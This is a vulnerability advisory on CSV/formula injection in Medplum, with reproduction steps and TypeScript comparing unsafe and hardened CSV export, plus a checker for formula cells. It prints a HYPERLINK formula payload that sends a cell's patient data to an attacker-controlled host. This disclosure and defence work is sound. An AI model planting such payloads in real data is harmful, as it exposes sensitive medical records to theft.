CSV/Formula Injection in Medplum


Vulnerability Reports
March 6, 2024

Jason Franscisco

CVE Number


Loginsoft ID



The application “Medplum” is affected by a CSV/formula injection vulnerability that puts sensitive data at risk of exposure. An attacker with a low-privileged account can store a spreadsheet formula in an input field (for example the patient gender field). When a higher-privileged user later exports that data as CSV and opens the file in a spreadsheet application such as Excel or LibreOffice Calc, the application interprets the stored value as a formula and evaluates it in the victim's context.


CWE-1236: Improper Neutralization of Formula Elements in a CSV File

Affected Versions

< v3.0.8


CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8 (Medium)

Steps To Reproduce
  1. Create a new patient with the gender field set to the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me")`.
  2. Export the patient data in CSV format.
  3. Open the CSV file in a spreadsheet application, hold the Ctrl key, and left-click the cell showing the value "Click Me".
  4. The spreadsheet follows the hyperlink, sending the contents of cell F3 to the attacker-controlled host (here `http://localhost:8181`) as the `data` query parameter, exposing the sensitive data stored in that cell.

Exposure of sensitive patient data to an attacker-controlled host.


Treat every field as text when exporting to CSV: neutralize values that begin with a formula trigger character (`=`, `+`, `-`, `@`, tab, carriage return) by prefixing them with a single quote, and wrap fields in double quotes with embedded quotes doubled, so the spreadsheet application never evaluates them. Additionally, validate and filter user-supplied input fields on the way in.
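To make the steps to reproduce and the mitigation concrete, the following TypeScript is an added example, not Medplum's code: an export routine that only applies RFC 4180 quoting (the pattern that lets the reported payload through) next to a hardened one that neutralizes formula triggers, and a small checker that parses an exported CSV and reports any cell a spreadsheet would evaluate. The `Patient` shape, the column layout, the function names and the sample records are assumptions made for the example; only the payload string is taken from the report.

```typescript
// Added example (not Medplum's code). Patient shape, columns and sample rows are assumptions.
type Patient = {
  id: string; name: string; gender: string; birthDate: string; phone: string; identifier: string;
};

// Payload from the report: a HYPERLINK whose URL embeds the value of cell F3.
const PAYLOAD = '=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me")';

// Constructed sample data. The header is spreadsheet row 1, so the attacker's record is
// row 2 and the victim's is row 3; "identifier" is the 6th column, so F3 is the victim's identifier.
const SAMPLE_PATIENTS: Patient[] = [
  { id: 'p-1', name: 'Mallory Attacker', gender: PAYLOAD, birthDate: '1990-01-01', phone: '555-0100', identifier: 'MRN-0001' },
  { id: 'p-2', name: 'Alice Example', gender: 'female', birthDate: '1985-06-15', phone: '555-0101', identifier: 'MRN-0002' },
];
const COLUMNS: (keyof Patient)[] = ['id', 'name', 'gender', 'birthDate', 'phone', 'identifier'];

// Leading characters that make Excel / LibreOffice Calc treat a field as a formula (CWE-1236).
const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);

// A plain signed number ("-5") starts with a trigger but evaluates to itself; leave it alone.
function looksLikeFormula(value: string): boolean {
  return value.length > 0 && FORMULA_TRIGGERS.has(value[0]) && !/^[-+]?\d+(\.\d+)?$/.test(value);
}

// Vulnerable (pre-fix style): RFC 4180 quoting only. A quoted field that starts with
// "=" is still evaluated once the spreadsheet strips the quotes.
function unsafeCsvField(value: string): string {
  return /[",\r\n]/.test(value) ? '"' + value.replace(/"/g, '""') + '"' : value;
}

// Hardened: prefix formula triggers with an apostrophe, then always quote so that
// separators, embedded quotes and the apostrophe itself survive the export.
function safeCsvField(value: string): string {
  const v = looksLikeFormula(value) ? "'" + value : value;
  return '"' + v.replace(/"/g, '""') + '"';
}

function toCsv(patients: Patient[], field: (v: string) => string): string {
  const lines = [COLUMNS.map(c => field(c)).join(',')];
  for (const p of patients) lines.push(COLUMNS.map(c => field(p[c])).join(','));
  return lines.join('\r\n') + '\r\n';
}

const exportPatientsUnsafe = (p: Patient[]): string => toCsv(p, unsafeCsvField);
const exportPatientsSafe = (p: Patient[]): string => toCsv(p, safeCsvField);

// Minimal RFC 4180 parser so the checker sees fields the way a spreadsheet does.
function parseCsv(csv: string): string[][] {
  const rows: string[][] = [];
  let row: string[] = [];
  let field = '';
  let inQuotes = false;
  for (let i = 0; i < csv.length; i++) {
    const ch = csv[i];
    if (inQuotes) {
      if (ch === '"') {
        if (csv[i + 1] === '"') { field += '"'; i++; } else { inQuotes = false; }
      } else {
        field += ch;
      }
    } else if (ch === '"') {
      inQuotes = true;
    } else if (ch === ',') {
      row.push(field); field = '';
    } else if (ch === '\r' || ch === '\n') {
      if (ch === '\r' && csv[i + 1] === '\n') i++;
      row.push(field); field = '';
      rows.push(row); row = [];
    } else {
      field += ch;
    }
  }
  if (field.length > 0 || row.length > 0) { row.push(field); rows.push(row); }
  return rows;
}

// Checker: report every cell (A1-style, up to 26 columns) whose unquoted value a spreadsheet would evaluate.
function findFormulaCells(csv: string): { cell: string; value: string }[] {
  const hits: { cell: string; value: string }[] = [];
  parseCsv(csv).forEach((row, r) => row.forEach((value, c) => {
    if (looksLikeFormula(value)) hits.push({ cell: `${String.fromCharCode(65 + c)}${r + 1}`, value });
  }));
  return hits;
}

console.log('unsafe export:', findFormulaCells(exportPatientsUnsafe(SAMPLE_PATIENTS)));
console.log('safe export:', findFormulaCells(exportPatientsSafe(SAMPLE_PATIENTS)));
```

Running the checker over the unsafe export flags the gender cell C2 holding the HYPERLINK payload; over the hardened export it finds nothing, because the stored value now begins with an apostrophe and is displayed as text. One caveat of the apostrophe approach: some importers show the apostrophe literally, so phone numbers written with a leading `+` will carry a visible quote; that is the trade-off for a fix that works regardless of which spreadsheet application the exporting user opens the file in.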



Discovered Date

15 February 2024

Reported Date

19 February 2024

Patched Date

03 March 2024


Saharsh Agrawal
